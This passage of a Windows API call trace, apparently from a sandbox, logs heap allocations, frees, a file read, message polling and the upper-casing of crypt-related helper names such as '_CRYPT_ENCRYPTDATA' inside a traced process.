HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0192.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0192.119] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0192.119] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0192.119] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0192.119] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x100000) returned 0x2480020 [0192.119] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0192.120] ReadFile (in: hFile=0x160, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0xaee7, lpOverlapped=0x0) returned 1 [0192.122] ReadFile (in: hFile=0x160, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0192.122] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0192.122] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0192.122] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0192.122] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0192.123] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xaee7) returned 0xbea018 [0192.123] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x2480020 | out: hHeap=0x8a0000) returned 1 [0192.123] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0192.123] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0192.124] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df140 | out: hHeap=0x8a0000) returned 1 [0192.124] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0192.124] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0192.124] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xaee7) returned 0xbf4f08 [0192.124] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbea018 | out: hHeap=0x8a0000) returned 1 [0192.124] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0192.124] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.124] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0192.124] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df140 [0192.124] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0192.124] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0192.124] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0192.124] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xaee7) returned 0xbea018 [0192.124] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0192.124] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbea018 | out: hHeap=0x8a0000) returned 1 [0192.125] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0192.125] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0192.125] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df140 | out: hHeap=0x8a0000) returned 1 [0192.125] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0192.125] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.125] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0192.125] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0192.125] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0192.125] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0192.125] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0192.125] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0192.125] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90afd8 [0192.125] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.125] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0192.125] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0192.125] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0192.125] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0192.125] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0192.125] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0192.125] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df140 [0192.125] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c26d8 [0192.125] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def10 [0192.125] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0192.125] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0192.125] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0192.126] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xaee7) returned 0xbea018 [0192.126] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0192.126] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2738 [0192.126] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0192.126] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0192.126] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0192.126] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c26c8 [0192.126] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0192.126] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0192.126] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0192.126] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2658 [0192.126] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0192.126] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0192.126] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0192.126] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bdac8 [0192.126] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0c8 [0192.126] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0192.126] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0192.126] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0192.126] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0192.126] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xaee7) returned 0xbffdf8 [0192.127] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0192.127] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0192.127] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0192.127] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0192.127] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0192.127] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0192.127] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0192.127] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0192.127] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0192.127] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0192.127] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0192.127] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0192.127] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0192.127] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0192.127] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0192.127] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.127] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0192.127] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0192.128] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0192.128] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0192.128] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90b018 [0192.128] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.128] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0192.128] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0192.128] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0192.128] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0192.128] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df078 [0192.128] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0192.128] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0192.128] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0192.128] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0192.128] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0192.128] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0192.128] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0192.128] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0192.128] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0192.128] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0192.128] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2878 [0192.128] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0192.128] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0192.128] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0192.128] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0192.128] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd750 [0192.129] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0192.129] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0192.129] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0192.129] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0192.129] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0192.129] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0192.129] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0192.129] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0192.129] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deec0 [0192.129] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0192.129] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0192.129] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0192.129] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0192.129] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0192.129] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0192.129] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df190 [0192.129] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0192.129] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0192.129] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0192.129] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0192.129] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d480 [0192.129] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0192.129] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0192.129] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0192.129] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa548 [0192.129] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0192.130] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0192.130] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0192.130] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0192.130] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0192.130] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0192.130] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0192.130] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0192.130] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0192.130] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0192.130] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0192.130] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0192.130] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0192.130] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0192.130] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0192.130] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0192.130] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0192.130] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0192.130] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0192.130] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0192.130] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0192.130] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0192.130] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df190 | out: hHeap=0x8a0000) returned 1 [0192.130] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0192.130] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0192.130] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df190 [0192.130] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0192.131] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0192.131] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0192.131] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0192.131] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0192.131] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0192.131] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0192.131] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0192.131] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0192.131] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0192.131] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0192.131] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0192.131] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0192.131] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0192.131] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0192.131] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0192.131] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0192.131] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0192.131] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0192.131] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0192.131] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0192.131] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0192.131] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0192.131] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0192.131] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df190 | out: hHeap=0x8a0000) returned 1 [0192.132] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0192.132] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df190 [0192.132] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0192.132] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0192.132] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0192.132] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0192.132] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0192.132] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0192.132] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0192.132] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0192.132] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0192.132] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0192.132] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0192.132] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0192.132] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0192.132] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0192.132] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9fb8 [0192.132] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db408 [0192.132] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0192.132] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0192.132] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0192.132] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0192.132] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0192.133] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0192.133] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0192.133] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0192.133] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0192.133] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0192.133] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0192.133] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0192.133] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0192.133] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0192.133] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0192.133] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0192.133] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0192.133] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0192.133] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0192.133] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0192.133] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0192.133] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0192.133] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, 